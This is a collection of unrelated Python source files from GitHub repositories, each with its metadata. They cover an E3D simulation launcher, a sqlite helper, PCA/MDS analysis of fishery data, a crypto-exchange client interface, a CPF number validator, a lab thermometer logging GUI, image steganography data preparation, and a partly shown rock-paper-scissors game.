input(\"Line 784, DebugMode, SimLoopPartialFilling: Initial q2p1_sse_partfil iteration\")\n simLoopMainPartialFilling(workingDir, it, nLoops)\n it = it + 1\n\n \n for i in range(nLoops):\n if paramDict['shortTest']:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramAlpha_test.dat\")\n else:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramAlpha.dat\")\n \n destBackupFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n shutil.copyfile(str(sourceParamFile), str(destBackupFile))\n msg = \"Copied %s => %s \" %(str(sourceParamFile), str(destBackupFile))\n if debugNoSim:\n print(msg)\n\n sourceParamFile = Path(\"_data_PF\") / Path(\"mesh_names.offs\")\n destBackupFile = Path(\"./mesh_names.offs\")\n shutil.copyfile(str(sourceParamFile), str(destBackupFile))\n msg = \"Copied %s => %s \" %(str(sourceParamFile), str(destBackupFile))\n #print(msg)\n\n if not debugNoSim:\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q1_scalar_partfil.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q1_scalar_partfil\"\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q1_scalar_partfil\"\n\n exitCode = subprocess.call([launchCommand], shell=True) \n else:\n input(\"Line 824, DebugMode, SimLoopPartialFilling: q1_scalar_partfil\")\n exitCode = 0 \n\n if paramDict['shortTest']:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_1_test.dat\")\n else:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_1.dat\")\n\n destBackupFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n shutil.copyfile(str(sourceParamFile), str(destBackupFile))\n msg = \"Copied %s => %s \" %(str(sourceParamFile), str(destBackupFile))\n if debugNoSim:\n print(msg)\n\n simLoopMainPartialFilling(workingDir, it, nLoops)\n it = it + 1\n#===============================================================================\n \n\n#===============================================================================\n# Main Script Function\n#===============================================================================\ndef main():\n \"\"\"\n The main function that controls the extrusion process\n\n Options:\n project-folder: Path to project folder containing a setup.e3d file \n num-processors: Number of processors to use\n periodicity: Periodicity of the solution (1, 2, 3, ... 
usually the time flight number)\n angle: If present, a single simulation with that specific angle will be done\n delta-angle: The angular step size between two simulations in the sim loop (default 10)\n host-conf: A hostfile as input for the mpirun command\n rank-file: A rankfile as input for the mpirun command\n time: Number of time levels to complete a full 360 rotation \n \"\"\"\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'n:f:p:d:a:c:r:t:smxhovur',\n ['num-processors=', 'project-folder=',\n 'periodicity=', 'delta-angle=', 'angle=',\n 'host-conf=', 'rank-file=', 'time=', 'skip-setup','die-simulation',\n 'skip-simulation','short-test', 'help',\n 'do-temperature','version', 'use-srun',\n 'retry-deformation', 'partial-filling','only-mesh-creation',\n 'mesh-reduction'])\n\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit(2)\n elif opt in ('-f', '--project-folder'):\n paramDict['projectFolder'] = arg\n elif opt in ('-n', '--num-processors'):\n paramDict['numProcessors'] = int(arg)\n elif opt in ('-p', '--periodicity'):\n paramDict['periodicity'] = int(arg)\n elif opt in ('-a', '--angle'):\n paramDict['singleAngle'] = float(arg)\n elif opt in ('-d', '--delta-angle'):\n paramDict['deltaAngle'] = float(arg)\n paramDict['hasDeltaAngle'] = True \n if paramDict['deltaAngle'] <= 0.0:\n print(\"Parameter deltaAngle is set to a number <= 0 which is invalid. Please enter a number > 0\")\n sys.exit(2)\n elif opt in ('-c', '--host-conf'):\n paramDict['hostFile'] = arg\n elif opt in ('-r', '--rank-file'):\n paramDict['rankFile'] = arg\n elif opt in ('-t', '--time'):\n paramDict['timeLevels'] = int(arg)\n paramDict['hasTimeLevels'] = True \n if paramDict['timeLevels'] <= 0:\n print(\"Parameter timeLevels is set to a number <= 0 which is invalid. Please enter a number > 0\")\n sys.exit(2)\n elif opt in ('-s', '--skip-setup'):\n paramDict['skipSetup'] = True\n elif opt in ('-m', '--skip-simulation'):\n paramDict['skipSimulation'] = True\n elif opt in ('-o', '--do-temperature'):\n paramDict['temperature'] = True\n elif opt in ('-v', '--version'):\n version()\n sys.exit(2)\n elif opt in ('-x', '--short-test'):\n paramDict['shortTest'] = True\n elif opt in ('-u', '--use-srun'):\n paramDict['useSrun'] = True\n elif opt in ('--die-simulation',):\n paramDict['dieSimulation'] = True\n elif opt in ('--mesh-reduction',):\n paramDict['meshReduction'] = True\n elif opt in ('--retry-deformation',):\n paramDict['retryDeformation'] = True\n elif opt in ('--partial-filling',):\n paramDict['partialFilling'] = True\n paramDict['singleAngle'] = 0.0 \n elif opt in ('--only-mesh-creation',):\n paramDict['onlyMeshCreation'] = True\n else:\n usage()\n sys.exit(2)\n\n if paramDict['projectFolder'] == \"\":\n print(\"Error: no project folder specified.\")\n usage()\n sys.exit(2)\n\n if (paramDict['hasDeltaAngle'] and paramDict['hasTimeLevels']):\n print(\"Error: Specifying both deltaAngle and timeLevels at the same time is error-prone and therefore prohibited.\")\n sys.exit(2)\n \n if (paramDict['singleAngle'] >= 0.0 and paramDict['temperature']) :\n print(\"Error: Specifying both singleAngle and Temperature Simulation at the same time is prohibited.\")\n sys.exit(2)\n \n if (paramDict['dieSimulation']) :\n print(\"Switching to 'DIE' simulation !\")\n paramDict['singleAngle'] = 0\n\n if (paramDict['meshReduction']) :\n print(\"Switching to 'MESHreduction' mode !\")\n paramDict['singleAngle'] = 0\n\n if (paramDict['numProcessors'] < 3 and not paramDict['onlyMeshCreation']) :\n print(\"Number of processors should be at least 3\")\n 
sys.exit(2)\n\n# if (paramDict['onlyMeshCreation']) :\n# print(\"Only doing mesh creation\")\n# sys.exit(2)\n \n # Get the case/working dir paths\n projectFolder = paramDict['projectFolder'] \n workingDir = Path('.')\n projectPath = Path(workingDir / projectFolder)\n projectFile = Path(projectPath / 'setup.e3d')\n\n myLog.openFileHandle()\n myLog.writeGeneralInfo(paramDict)\n myLog.writeNumAnglePositions(calcMaxSimIterations())\n myLog.writeStatusLine2()\n myLog.closeFileHandle()\n\n setupMPICommand()\n\n e3dSetupDict = e3dToDict(projectFile)\n\n if not paramDict['hasTimeLevels']:\n if \"SimodSetting\" in e3dSetupDict:\n if \"time_levels\" in e3dSetupDict['SimodSetting']:\n if e3dSetupDict['SimodSetting']['time_levels'].isnumeric():\n paramDict['timeLevels'] = int(e3dSetupDict['SimodSetting']['time_levels'])\n paramDict['hasTimeLevels'] = True\n else:\n raise TypeError(\"e3d.setup ['SimodSetting']['time_levels'] is not a numeric entry. Please enter a number > 0.\")\n\n\n if not paramDict['skipSetup']:\n if paramDict['onlyMeshCreation']:\n exitCode = onlyMeshCreation(workingDir, projectFile, projectPath, projectFolder)\n return\n else:\n exitCode = simulationSetup(workingDir, projectFile, projectPath, projectFolder)\n\n if paramDict['skipSimulation']:\n sys.exit()\n\n print(\" \")\n print(\" ----------------------------------------------------------------------------------------------------- \")\n print(\" Launching E3D... \")\n print(\" ----------------------------------------------------------------------------------------------------- \")\n print(\" \")\n print(\" \")\n\n if paramDict['partialFilling']:\n simLoopPartialFilling(workingDir)\n cleanWorkingDir(workingDir)\n elif paramDict['temperature']:\n simLoopTemperatureCombined(workingDir)\n cleanWorkingDir(workingDir)\n elif paramDict['meshReduction']:\n simLoopMeshReduction(workingDir)\n cleanWorkingDir(workingDir)\n projectFolder = paramDict['projectFolder'] \n projectPath = Path(workingDir / projectFolder)\n meshDirPath = projectPath / Path(\"meshDir\")\n print(\"Back up the old mesh and copy the newly generated reduced mesh from \" + \n \"'ReducedMeshDir' to \" + str(meshDirPath))\n shutil.move(str(meshDirPath),str(meshDirPath) + \"_BU\")\n shutil.copytree(\"ReducedMeshDir\", str(meshDirPath))\n else:\n simLoopVelocity(workingDir)\n cleanWorkingDir(workingDir)\n\n#===============================================================================\n# Main Boiler Plate\n#===============================================================================\nif __name__ == \"__main__\":\n main()\n myLog.writeExitMsg()\n","repo_name":"rmuenste/FeatFloWer","sub_path":"tools/e3d_scripts/e3d_start.py","file_name":"e3d_start.py","file_ext":"py","file_size_in_byte":44785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31220222355","text":"import sqlite3\r\n\r\n\r\nclass connectDB:\r\n def __init__(self):\r\n self.connect = sqlite3.connect('database.db')\r\n\r\n def create_table(self):\r\n con = self.connect.cursor()\r\n\r\n con.execute(\"\"\"create table if not exists book (\r\n id_book integer primary key autoincrement ,\r\n name text,\r\n author text,\r\n launch text,\r\n edition text,\r\n publishing_company text,\r\n genre text)\"\"\")\r\n self.connect.commit()\r\n con.close()","repo_name":"CidAlexandre/Book","sub_path":"CRUD/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25714219941","text":"import pandas as pd\nimport numpy as np\nfrom scipy.spatial import distance_matrix\n# from scipy.spatial import distance\n# from scipy.spatial.distance import cdist\nfrom sklearn import manifold\n# import collections\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\nimport matplotlib.pyplot as plt\n\nimport pdb\n\ndef biplot(X, labels, arrow_mul=1, text_mul=1.1):\n\n pca = PCA(n_components=2)\n X = pca.fit_transform(X)\n\n x_data = X[:,0]\n y_data = X[:,1]\n\n pc0 = pca.components_[0]\n pc1 = pca.components_[1]\n\n plt.figure()\n plt.scatter(x_data, y_data)\n\n for i in range(pc0.shape[0]):\n plt.arrow(0, 0,\n pc0[i]*arrow_mul, pc1[i]*arrow_mul,\n color='r')\n plt.text(pc0[i]*arrow_mul*text_mul,\n pc1[i]*arrow_mul*text_mul,\n labels,\n color='r')\n plt.show()\n\n\n\"\"\"\ndf = pd.read_csv('chinen.csv')\nspecimen = set(df.iloc[:, 2])\namount = df.iloc[:, 4]\n# specimen_count = collections.Counter(specimen)\n\nspec_amount_dict = {}\nfor species in specimen:\n idx = np.where(df.iloc[:, 2] == species, True, False)\n spec_amount_dict[species] = np.sum(amount.iloc[idx])\n\nsorted_list = sorted(spec_amount_dict.items(), key=lambda x:x[1])\nsorted_amount_list = [item[1] for item in sorted_list][::-1]\nsorted_specimen_list = [item[0] for item in sorted_list][::-1]\ncum_ratio_list = np.cumsum(sorted_amount_list)/np.sum(sorted_amount_list)\nfocused_idx = np.where(cum_ratio_list < 0.9, True, False)\n\nfocused_specimen_list = sorted_specimen_list[:20]\nfocused_years_list = np.arange(1996, 2021)\n\nresult_df = \"\"\nfor year in focused_years_list:\n year_str = str(year)\n idx = [year_str in item for item in df.iloc[:, 0]]\n sub_df = df.iloc[idx, :]\n sub_df = sub_df.reset_index(drop=True)\n\n tmp_dict = {}\n for i in range(len(sub_df)):\n species = sub_df.iat[i, 2]\n if species in focused_specimen_list:\n if species in tmp_dict:\n tmp_dict[species] += sub_df.iat[i, 4]\n else:\n tmp_dict[species] = sub_df.iat[i, 4]\n else:\n if 10000 in tmp_dict:\n tmp_dict[10000] += sub_df.iat[i, 4]\n else:\n tmp_dict[10000] = sub_df.iat[i, 4]\n\n tmp_ser = pd.Series(tmp_dict)\n\n if isinstance(result_df, str):\n result_df = pd.DataFrame(tmp_ser)\n result_df = result_df.T\n else:\n result_df = result_df.append(tmp_ser, ignore_index=True)\n\nnan_idx = np.isnan(result_df)\nresult_df[nan_idx] = 0\nresult_df.to_csv(\"year_feature_mat.csv\")\n\"\"\"\n\nfeature_df = pd.read_csv('year_feature_mat.csv')\nfeature_df = feature_df.iloc[:, 1:]\n# feature_df = pd.read_csv('cross.csv', index_col=0)\nlabels = feature_df.columns\nautoscaled_df = (feature_df - feature_df.mean()) / feature_df.std()\n\n# biplot(autoscaled_df, labels, arrow_mul=6)\n\npca = PCA()\npca.fit(autoscaled_df)\nscore = pd.DataFrame(pca.transform(autoscaled_df), index=feature_df.index)\n\nplt.scatter(score.iloc[:, 0], score.iloc[:, 1])\nplt.show()\n\npdb.set_trace()\n\n\"\"\"\ndist_mat = distance_matrix(feature_df.values, feature_df.values)\n# dist_mat = cdist(feature_df.values, feature_df.values, 'mahalanobis')\nmds = manifold.MDS(n_components=2, dissimilarity=\"precomputed\", random_state=6)\npos = mds.fit_transform(dist_mat)\n\npdb.set_trace()\ncov_mat = np.matrix(np.cov(feature_df.values.T, dtype=np.float64))\ninv_cov_mat = np.linalg.inv(cov_mat)\nmah_dist_mat = np.zeros((len(feature_df), len(feature_df)))\nfor i in range(0, (len(feature_df)-1)):\n u = feature_df.values[i, ]\n for j in range(i, len(feature_df)):\n v = feature_df.values[j, ]\n dist = distance.mahalanobis(u, v, 
inv_cov_mat)\n if np.isnan(dist):\n pdb.set_trace()\n mah_dist_mat[i, j] = dist\n\"\"\"\n\n# Compute the MDS embedding (the same lines as in the commented-out block\n# above) so that pos is defined before it is plotted.\ndist_mat = distance_matrix(feature_df.values, feature_df.values)\nmds = manifold.MDS(n_components=2, dissimilarity=\"precomputed\", random_state=6)\npos = mds.fit_transform(dist_mat)\n\nplt.scatter(pos[:, 0], pos[:, 1], marker = 'o')\nlabels = np.arange(1996, 2021)\n\nfor label, x, y in zip(labels, pos[:, 0], pos[:, 1]):\n plt.annotate(\n label,\n xy = (x, y),\n )\nplt.show()\n\npos_df = pd.DataFrame(pos)\npos_df.columns = ['x', 'y']\npos_df.to_csv('pos.csv')\n\npdb.set_trace()\n","repo_name":"djinn-pfa3736/fishery_data_analysis","sub_path":"phase_space_plot.py","file_name":"phase_space_plot.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42675283382","text":"import abc\nfrom typing import List\n\nfrom model.savings import InterestData\nfrom model.transaction import TradingPair, TradeData\nfrom model.withdrawal_deposit import WithdrawalData, DepositData\n\n\nclass ExchangeException(Exception):\n pass\n\n\nclass ExchangeUnderMaintenanceException(ExchangeException):\n pass\n\n\nclass AbstractCryptoExchangeClient(metaclass=abc.ABCMeta):\n @classmethod\n def __subclasshook__(cls, subclass):\n return (callable(subclass.get_trading_pairs) and\n hasattr(subclass, 'get_trading_pairs') and\n callable(subclass.get_trades) and\n hasattr(subclass, 'get_trades') and\n callable(subclass.get_savings_interests) and\n hasattr(subclass, 'get_savings_interests') and\n callable(subclass.get_withdrawals) and\n hasattr(subclass, 'get_withdrawals') and\n callable(subclass.get_deposits) and\n hasattr(subclass, 'get_deposits') or\n NotImplemented)\n\n @abc.abstractmethod\n def get_trading_pairs(self, list_of_symbols_and_codes: List[str]) -> List[TradingPair]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_trades(self, from_timestamp: int, to_timestamp: int, list_of_trading_pairs: List[TradingPair]) -> List[TradeData]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_savings_interests(self, from_timestamp: int, to_timestamp: int, list_of_assets: List[str]) -> List[InterestData]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_withdrawals(self, from_timestamp: int, to_timestamp: int, list_of_assets: List[str]) -> List[WithdrawalData]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_deposits(self, from_timestamp: int, to_timestamp: int, list_of_assets: List[str]) -> List[DepositData]:\n raise NotImplementedError\n\n\nclass AbstractCryptoExchangeClientModule(metaclass=abc.ABCMeta):\n @classmethod\n def __subclasshook__(cls, subclass):\n return (callable(subclass.get_exchange_client) and\n hasattr(subclass, 'get_exchange_client') and\n callable(subclass.get_exchange_name) and\n hasattr(subclass, 'get_exchange_name') and\n callable(subclass.is_enabled) and\n hasattr(subclass, 'is_enabled') or\n NotImplemented)\n\n @abc.abstractmethod\n def get_exchange_client(self) -> AbstractCryptoExchangeClient:\n raise NotImplementedError\n # return here the instance of your client implementation\n\n @abc.abstractmethod\n def get_exchange_name(self) -> str:\n raise NotImplementedError\n # return here the exchange name which will be used for logging and user-interaction purposes\n\n @abc.abstractmethod\n def is_enabled(self) -> bool:\n raise NotImplementedError\n # return here if the plugin is enabled and all needed configuration is 
set\n","repo_name":"financelurker/crypto-trades-firefly-iii","sub_path":"src/backends/exchanges/exchange_interface.py","file_name":"exchange_interface.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"19094183805","text":"from random import randint\n\n\ndef cpfdig(l_num):\n # l_num = l_num\n\n cpf_test1 = []\n\n for mult, _num in enumerate(l_num[::-1], 2):\n x = mult * int(_num)\n cpf_test1 += [x]\n dig = 11 - (sum(cpf_test1) % 11)\n if dig > 9:\n dig = 0\n\n return str(dig)\n\n\ndef sepcpf(cpf):\n if '-' in cpf:\n num, dig = cpf.split('-')\n else:\n dig, num = cpf[-2:], cpf[:-2]\n num = num.replace('.', '')\n return num, dig\n\n\ndef verifycpf(cpf):\n if cpf.count(cpf[0]) == 11:\n return False\n num, dig = sepcpf(cpf)\n d1 = cpfdig(num)\n d2 = cpfdig(num+d1)\n if d1+d2 == dig:\n rs = (num+dig).replace('', ' ').strip().split(' ')\n rs = sum(map(int, rs))\n return True if rs % 11 == 0 else False\n else:\n return False\n\n\ndef cpfformat(cpf):\n cpflista = cpf.replace('', ' ').strip().split(' ')\n cpflista.insert(9, '-')\n for ind in range(3, 9, 4):\n cpflista.insert(ind, '.')\n\n return ''.join(cpflista)\n\n\nif __name__ == '__main__':\n f = False\n while not f:\n cpf = str(randint(100000000, 999999999))\n dig = cpfdig(cpf)\n f = verifycpf(cpf)\n print(f, cpf)\n","repo_name":"EdAndradeF/geredor_cpf","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6890485008","text":"import PySimpleGUI as sg\r\nimport os.path\r\n\r\n#For graphing:\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\n\r\nimport time\r\n\r\n\r\n#VISA communication:\r\nimport pyvisa\r\n\r\n\r\n#Instrument interaction related functions:\r\ndef full_query(my_instrument, arg):\r\n my_instrument.write(arg)\r\n try:\r\n s=str(my_instrument.read())\r\n my_instrument.clear()\r\n return s\r\n except UnicodeDecodeError:\r\n window[\"-BUFFER-\"].print('----UnicodeDecodeError----')\r\n\r\ndef full_print(my_instrument):\r\n while True:\r\n try:\r\n s=str(my_instrument.read()).strip()\r\n ss=''\r\n if '*' in s:\r\n my_instrument.clear()\r\n break\r\n else:\r\n window[\"-BUFFER-\"].print(' '+s)\r\n except UnicodeDecodeError:\r\n window[\"-BUFFER-\"].print('----UnicodeDecodeError----')\r\n\r\n\r\n#Functions needed for graphing:\r\ndef fig_maker(t,tenp):\r\n plt.ylim(20, 40)\r\n plt.grid()\r\n plt.scatter(t, tenp, c='blue')\r\n return plt.gcf()\r\n\r\ndef draw_figure(canvas, figure, loc=(0, 0)):\r\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\r\n figure_canvas_agg.draw()\r\n figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)\r\n return figure_canvas_agg\r\n\r\ndef delete_fig_agg(fig_agg):\r\n fig_agg.get_tk_widget().forget()\r\n plt.close('all')\r\n\r\n \r\n#---------------------------------------------------------------------------------------------------------\r\n\r\n\r\n# Define the elements for the GUI\r\n\r\nfirst_column = [\r\n [ sg.Text('VISA resource name',s=(20,1)), sg.Text('Time unit (s)',s=(20,1))],\r\n [ sg.Combo(['', 'Temperature', 'Arduino'],\\\r\n s=(20,1), enable_events=True, readonly=True, key='-DEVICE-'),\r\n sg.Input(s=20, key='-TUNIT-', enable_events=True, default_text= '0.5')\r\n ],\r\n [\r\n sg.Text(\"File to save 
data\")],\r\n [ sg.In(s=(30, 1), enable_events=True, key=\"-FILE-\"),\r\n sg.FileBrowse(s=(10, 1)),\r\n ],\r\n [ sg.Text('Buffer')],\r\n [ sg.Multiline(s=(45, 20), enable_events=True, \\\r\n no_scrollbar = True, autoscroll=True, key=\"-BUFFER-\", \\\r\n default_text= 'No data yet', do_not_clear=True)\r\n ],\r\n]\r\n\r\nsecond_column = [\r\n [ sg.Text('Time (s)',s=(17,1)),\r\n sg.Text('Temperature (ºC)',s=(20,1))\r\n ],\r\n [ sg.Multiline(s=(20, 1), enable_events=True, \\\r\n no_scrollbar = True, key=\"-TIME-\", \\\r\n default_text= ' '),\r\n sg.Multiline(s=(20, 1), enable_events=True, \\\r\n no_scrollbar = True, key=\"-TEMPERATURE-\", \\\r\n default_text= ' ')\r\n ],\r\n [ sg.VPush()],\r\n [ sg.Text('T vs t plot')],\r\n [ sg.Canvas(s=(300, 260), key='-CANVAS-',background_color='white')],\r\n [ sg.Text('', s=(10,1))],\r\n [\r\n sg.Button('Start', s=(11,2), enable_events=True, key=\"-START-\"),\r\n sg.Button('Stop', s=(11,2), enable_events=True, key=\"-STOP-\"),\r\n sg.Button('Exit', s=(11,2), enable_events=True, key=\"-EXIT-\")\r\n ],\r\n [\r\n sg.Button('System Information', s=(37,1), enable_events=True, key=\"-INFO-\")\r\n ]\r\n]\r\n\r\n# Set the right click menu\r\nMENU_RIGHT_CLICK_EDITME_VER_EXIT = ['', ['Version', 'Exit']]\r\n'''\r\nAdd this to your window call:\r\nright_click_menu=sg.MENU_RIGHT_CLICK_EDITME_VER_EXIT\r\n'''\r\n\r\n\r\n# Set the full layout and the window\r\nlayout = [\r\n [\r\n sg.Column(first_column, s=(350,500)),\r\n sg.VSeperator(),\r\n sg.Column(second_column, s=(350,500)),\r\n ]\r\n]\r\n\r\nwindow = sg.Window(\"Temperature reading\", layout, finalize=True, \\\r\n right_click_menu=sg.MENU_RIGHT_CLICK_EDITME_VER_EXIT)\r\n\r\n\r\n\r\n# Run the Event Loop --------------------------------------------------------------------------------------\r\n\r\nbreak_out_flag = False #This will help us to exit all the while loops, from the innermost to the outside.\r\nfile_flag=False #This speficies wheteher a file name has been given or not.\r\nt_unit=0.5 #The default time between measurements will be 0.5s.\r\n\r\nfig_agg0 = None \r\n\r\nwhile True:\r\n event, values = window.read()\r\n\r\n #Exit the program:\r\n if event == \"Exit\" or event == sg.WIN_CLOSED or break_out_flag or event == '-EXIT-':\r\n break\r\n\r\n #Choose and configure the device. It only works for the thermometer.\r\n elif event == '-DEVICE-':\r\n rm = pyvisa.ResourceManager()\r\n if values['-DEVICE-'] == 'Temperature':\r\n try:\r\n #Set connection with the device\r\n my_instrument = rm.open_resource('ASRL1::INSTR')\r\n my_instrument.baud_rate = 9600\r\n my_instrument.data_bits=8\r\n my_instrument.parity=0 #None\r\n my_instrument.stop_bits=10 #one = \r\n my_instrument.flow_control=0 #none\r\n\r\n my_instrument.read_termination = '\\n'\r\n my_instrument.write_termination = '\\r'\r\n\r\n window[\"-BUFFER-\"].update(f\"Current instrument:\\n{my_instrument}\\n\\n\")\r\n except:\r\n window[\"-BUFFER-\"].print('Connection with the thermometer can not be done. 
\\\r\n Try again.', end=2*'\\n')\r\n continue\r\n finally:\r\n #Print data\r\n window[\"-BUFFER-\"].print(f\"{'Enclosure temperature:':<25}{full_query(my_instrument, 'b')[2:]}ºC\", end=2*'\\n')\r\n \r\n elif values['-DEVICE-'] == 'Arduino':\r\n window[\"-BUFFER-\"].update(\"This program does not support the selected device.\")\r\n else:\r\n window[\"-BUFFER-\"].update('No device selected.')\r\n\r\n #Choose and open the file where the data will be written.\r\n elif event == \"-FILE-\":\r\n file_name = values[\"-FILE-\"]\r\n if file_name.lower().endswith((\".txt\", \".dat\")):\r\n window[\"-BUFFER-\"].update(f'Data will be written in: {file_name}')\r\n file_flag=True\r\n try:\r\n file=open(file_name, 'w', encoding='utf-8')\r\n except:\r\n window[\"-BUFFER-\"].update(\"Error while opening the file.\\n\")\r\n else:\r\n window[\"-BUFFER-\"].update('The file type is not correct. Try .txt or .dat.')\r\n #raise TypeError('The file type is not correct. Try .txt or .dat')\r\n\r\n #Set a different timing between measurements.\r\n elif event == '-TUNIT-':\r\n try:\r\n t_unit=float(values['-TUNIT-'])\r\n window[\"-BUFFER-\"].update(f'Time unit: {t_unit}s.')\r\n except:\r\n window[\"-BUFFER-\"].update('Time unit value error.')\r\n t_unit=0.5\r\n\r\n #This configures one of the options of the right-click menu.\r\n elif event == 'Version':\r\n sg.popup_scrolled(sg.get_versions())\r\n\r\n #Pressing the STOP button will pause the program but will not close it.\r\n elif event == '-STOP-':\r\n window[\"-BUFFER-\"].update('')\r\n window[\"-TIME-\"].update('')\r\n window[\"-TEMPERATURE-\"].update('')\r\n delete_fig_agg(fig_agg0)\r\n\r\n #Pressing the INFO button will print the system information that the computer can get.\r\n elif event == '-INFO-':\r\n if values['-DEVICE-'] == 'Temperature':\r\n window[\"-BUFFER-\"].update(\"System information:\")\r\n my_instrument.write('i')\r\n full_print(my_instrument)\r\n else:\r\n window[\"-BUFFER-\"].update('Select an appropriate device.')\r\n \r\n #Pressing START will begin the measurements. 
An additional while loop will be needed.\r\n elif event == '-START-':\r\n if values['-DEVICE-'] != 'Temperature': #This program only supports the thermometer.\r\n window[\"-BUFFER-\"].update('Select an appropriate device.')\r\n continue\r\n window[\"-BUFFER-\"].update(f\"{' t(s)':>10} {'T(ºC)':^10}\\n\")\r\n t_0=time.time()\r\n t_1=0\r\n t_list=[]\r\n tenp_list=[]\r\n while True:\r\n event, values = window.read(timeout=1) #Unit: ms\r\n if event == \"Exit\" or event == sg.WIN_CLOSED:\r\n break_out_flag=True #When this is checked in the general loop, the cycle will be exited without needing to press EXIT again.\r\n break\r\n elif event == \"-STOP-\": #Pressing STOP does not delete the data written on the file, it only adds an empty line between sets of measurements.\r\n if file_flag:\r\n file.write(\"\\n\")\r\n break\r\n else:\r\n t=time.time()-t_0\r\n if t-t_1 >= t_unit:\r\n t_1=t\r\n tenp=float(full_query(my_instrument, 't'))\r\n window[\"-BUFFER-\"].print(f\"{t:>10.3f} {tenp:<10}\", end='\\n')\r\n window[\"-TIME-\"].update(round(t,3))\r\n window[\"-TEMPERATURE-\"].update(tenp)\r\n\r\n t_list.append(t)\r\n tenp_list.append(tenp)\r\n fig = fig_maker(t_list,tenp_list)\r\n \r\n fig.set_size_inches(3, 2.6, forward=True)\r\n fig_agg = draw_figure(window['-CANVAS-'].TKCanvas, fig)\r\n if fig_agg0 is not None:\r\n delete_fig_agg(fig_agg0)\r\n window.Refresh()\r\n fig_agg0=fig_agg\r\n \r\n if file_flag:\r\n file.write(f\"{t:>10.3f} {tenp:<10}\\n\")\r\n \r\n \r\nif file_flag: #closes the file only if a file has been opened before.\r\n file.close()\r\n \r\nwindow.close()\r\nmy_instrument.close()\r\n","repo_name":"BeBerasategi/Pythonen-bidezko-LabVIEW-ren-ordezkoa","sub_path":"Python_VISA_neurketa.py","file_name":"Python_VISA_neurketa.py","file_ext":"py","file_size_in_byte":9788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"907317010","text":"import os\nimport glob\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n\ndef load_data(cover_images_path, secret_images_path, image_shape=(64, 64)):\n cover_train_paths = glob.glob(cover_images_path+'*')\n secret_train_paths = glob.glob(secret_images_path+'*')\n\n cover_images = []\n secret_images = []\n\n for cover, sc in zip(sorted(cover_train_paths), sorted(secret_train_paths)):\n cov = Image.open(cover).convert('RGB').resize(image_shape)\n secret = Image.open(sc).convert('RGB').resize(image_shape)\n cover_images.append(cov)\n secret_images.append(secret)\n\n return cover_images, secret_images\n\n\ndef normalize_images(images):\n return np.array([np.array(img) / 255.0 for img in images])\n\ndef split_data(cover_images, secret_images):\n cover_images = normalize_images(cover_images)\n secret_images = normalize_images(secret_images)\n\n X_cover_train, X_cover_val, X_secret_train, X_secret_val = train_test_split(cover_images, secret_images, test_size=0.2, random_state=42)\n\n return X_cover_train, X_cover_val, X_secret_train, X_secret_val\n\ndef create_dataset(X_cover, X_secret, batch_size, buffer_size):\n dataset = tf.data.Dataset.from_tensor_slices(((X_cover, X_secret), (X_cover, X_secret)))\n dataset = dataset.shuffle(buffer_size).batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n\n return 
dataset\n","repo_name":"Dini-49149/Image_steganography_DL","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"579621211","text":"import random\nimport colorama\nfrom colorama import Fore,Style\n\nopt = ['rock', 'paper', 'scissors']\n\nprint('How many times you want to play?')\ntimes = int(input())\n\nn = [] # to count the player wins\nm = [] # to count the computer wins\n\nfor _ in range(times):\n i = random.randint(0,2)\n comp = opt[i]\n \n print('Enter your choice: (rock,paper,scissors)')\n user = input().lower()\n \n if user == comp:\n print(Fore.BLUE + \" That's a tie\")\n n.append(0)\n m.append(0)\n elif user == 'rock':\n if comp =='scissors':\n print(Fore.GREEN + ' Congrats ', user,' smashed ', comp)\n n.append(1)\n else:\n print(Fore.RED + ' Sorry ', comp, ' covered ', user)\n m.append(1)\n elif user == 'paper':\n if comp == 'rock':\n print(Fore.GREEN + ' Congrats ', user,' covered ', comp)\n n.append(1)\n else:\n print(Fore.RED + ' Sorry ', comp, ' cuts ', user)\n m.append(1)\n elif user == 'scissors':\n if comp == 